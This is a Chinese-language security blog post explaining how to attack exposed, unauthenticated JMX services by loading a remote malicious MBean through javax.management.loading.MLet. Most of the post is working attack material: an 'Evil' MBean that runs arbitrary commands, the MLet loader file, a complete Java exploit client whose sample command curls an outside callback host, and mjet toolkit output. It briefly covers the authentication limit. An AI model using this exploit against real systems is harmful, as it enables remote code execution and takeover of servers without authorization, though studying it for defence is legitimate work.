JMX系列:Mlet利用方式(二)

上一节中介绍了JMX的框架及demo实现,在此基础上,来谈谈JMX的安全问题。JMX的安全问题,主要发生在

  1. jmx
  2. mbean
  3. rmi

其中,通过利用MLet是最常用的攻击手法,算是jmx特性+mbean利用,本节主要讲讲通过Mlet的攻击

MLet

Mlet 指的是javax.management.loading.MLet,该mbean有个getMBeansFromURL的函数,可以从远程mlet server加载mbean。

攻击过程:

  1. 启动托管MLet和含有恶意MBean的JAR文件的Web服务器
  2. 使用JMX在目标服务器上创建MBeanjavax.management.loading.MLet的实例
  3. 调用MBean实例的getMBeansFromURL方法,将Web服务器URL作为参数进行传递。JMX服务将连接到http服务器并解析MLet文件
  4. JMX服务下载并归档MLet文件中引用的JAR文件,使恶意MBean可通过JMX获取
  5. 攻击者最终调用来自恶意MBean的方法

Show me the code

evil Mbean

文件结构

1
2
├── Evil.java
└── EvilMBean.java
1
2
3
4
5
6
/**
 * @file EvilMBean.java
 */
public interface EvilMBean {
    public String runCommand(String cmd);
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
/**
 * @file Evil.java
 */
import java.io.*;

public class Evil implements EvilMBean
{
    public String runCommand(String cmd)
    {
        try {
            Runtime rt = Runtime.getRuntime();
            Process proc = rt.exec(cmd);
            BufferedReader stdInput = new BufferedReader(new InputStreamReader(proc.getInputStream()));
            BufferedReader stdError = new BufferedReader(new InputStreamReader(proc.getErrorStream()));
            String stdout_err_data = "";
            String s;
            while ((s = stdInput.readLine()) != null)
            {
                stdout_err_data += s+"\n";
            }
            while ((s = stdError.readLine()) != null)
            {
                stdout_err_data += s+"\n";
            }
            proc.waitFor();
            return stdout_err_data;
        }
        catch (Exception e)
        {
            return e.toString();
        }
    }
}

mlet server

文件结构

1
2
├── mlet
└── example-1.0-SNAPSHOT.jar
1
<html><mlet code="com.m0d9.sec.example.jmx.mlet.Evil" archive="example-1.0-SNAPSHOT.jar" name="MLetCompromise:name=evil,id=1" codebase="http://127.0.0.1:4141"></mlet></html>

其中

  1. example-1.0-SNAPSHOT.jar 为evel MBean的jar包,com.m0d9.sec.example.jmx.mlet.Evil 为路径
  2. name可自定义,为步骤被3创建的MBean
  3. 为http server地址,可通过python -m快速创建
1
/java/com/m0d9/sec/example/jmx/mlet> python -m SimpleHTTPServer 4141

attack code

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
/**
 * @file ExploitJMXByRemoteMBean.java
 */
import javax.management.MBeanServerConnection;
import javax.management.ObjectInstance;
import javax.management.ObjectName;
import javax.management.remote.JMXConnector;
import javax.management.remote.JMXConnectorFactory;
import javax.management.remote.JMXServiceURL;
import java.net.InetAddress;
import java.net.MalformedURLException;
import java.util.HashSet;
import java.util.Iterator;

public class ExploitJMXByRemoteMBean {

    public static void main(String[] args) {
        try {
//            connectAndOwn(args[0], args[1], args[2]);
            connectAndOwn("localhost","9999","curl evil.1.dns.m0d9.me");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    static void connectAndOwn(String serverName, String port, String command) throws MalformedURLException {
        try {
            // step1. 通过rmi创建 jmx连接
            JMXServiceURL u = new JMXServiceURL("service:jmx:rmi:///jndi/rmi://" + serverName + ":" + port + "/jmxrmi");
            System.out.println("URL: " + u + ", connecting");
            JMXConnector c = JMXConnectorFactory.connect(u);
            System.out.println("Connected: " + c.getConnectionId());
            MBeanServerConnection m = c.getMBeanServerConnection();

            // step2. 加载特殊MBean:javax.management.loading.MLet
            ObjectInstance evil_bean = null;
            ObjectInstance evil = null;
            try {
                evil = m.createMBean("javax.management.loading.MLet", null);
            } catch (javax.management.InstanceAlreadyExistsException e) {
                evil = m.getObjectInstance(new ObjectName("DefaultDomain:type=MLet"));
            }
            // step3:通过MLet加载远程恶意MBean
            System.out.println("Loaded "+evil.getClassName());
            Object res = m.invoke(evil.getObjectName(), "getMBeansFromURL", new Object[]
                            { String.format("http://%s:4141/mlet", InetAddress.getLocalHost().getHostAddress()) },
                    new String[] { String.class.getName() } );

            HashSet res_set = ((HashSet)res);
            Iterator itr = res_set.iterator();
            Object nextObject = itr.next();
            if (nextObject instanceof Exception)
            {
                throw ((Exception)nextObject);
            }
            evil_bean = ((ObjectInstance)nextObject);

            // step4: 执行恶意MBean
            System.out.println("Loaded class: "+evil_bean.getClassName()+" object "+evil_bean.getObjectName());
            System.out.println("Calling runCommand with: "+command);
            Object result = m.invoke(evil_bean.getObjectName(), "runCommand", new Object[]{ command }, new String[]{ String.class.getName() });
            System.out.println("Result: "+result);
        } catch (Exception e)
        {
            e.printStackTrace();
        }
    }
}

upload successful

mjet

其中的步骤也可以使用现有工具mjet【3】实现

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$ python mjet.py 127.0.0.1 1099 install aaa http://localhost:8080 8080

MJET - MOGWAI LABS JMX Exploitation Toolkit
===========================================
[+] Starting webserver at port 8080
[+] Using JMX RMI
[+] Connecting to: service:jmx:rmi:///jndi/rmi://127.0.0.1:1099/jmxrmi
[+] Connected: rmi://127.0.0.1  4
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from http://localhost:8080
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
127.0.0.1 - - [01/Jun/2020 15:25:39] "GET / HTTP/1.1" 200 -
127.0.0.1 - - [01/Jun/2020 15:25:39] "GET /nvkcvckb.jar HTTP/1.1" 200 -
[+] Successfully loaded MBeanMogwaiLabs:name=payload,id=1
[+] Changing default password...
[+] Loaded de.mogwailabs.MogwaiLabsMJET.MogwaiLabsPayload
[+] Successfully changed password
[+] Done

其中的逻辑步骤都已经很详细的输出了

upload successful

当然还有mjet其他的玩法,比如结合meterpreter进行使用

upload successful

限制

参考【2】,此总攻击方式有以下限制

  • JMX服务器可以连接到由攻击者控制的http服务。这是在目标服务器上加载恶意MBean的必要条件。
  • 未启用JMX身份验证。

启用JMX身份验证之后,还必须设置jmx.remote.x.mlet.allow.getMBeansFromURL=true才能调用getMBeansFromURL

MBeanServerAccessController 的具体实现:

1
2
3
4
5
6
7
8
9
10
11
12
    final String propName ="jmx.remote.x.mlet.allow.getMBeansFromURL";
    GetPropertyAction propAction = new GetPropertyAction(propName);
    String propValue = AccessController.doPrivileged(propAction);
    boolean allowGetMBeansFromURL ="true".equalsIgnoreCase(propValue);
    if (!allowGetMBeansFromURL) {
         throw new SecurityException("Access denied! MLet method " +
                 "getMBeansFromURLcannot be invoked unless a " +
                 "security manageris installed or the system property " +
                 "-Djmx.remote.x.mlet.allow.getMBeansFromURL=true" +
                 "isspecified.");
    }
...

小结

本节介绍了通过javax.management.loading.MLet来攻击JMX服务,在允许getMBeansFromURL的时候是最简单的攻击手段。如果存在限制,还可以尝试从其他可利用的mbean或者反序列化来尝试利用,后续再继续分享。

参考

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true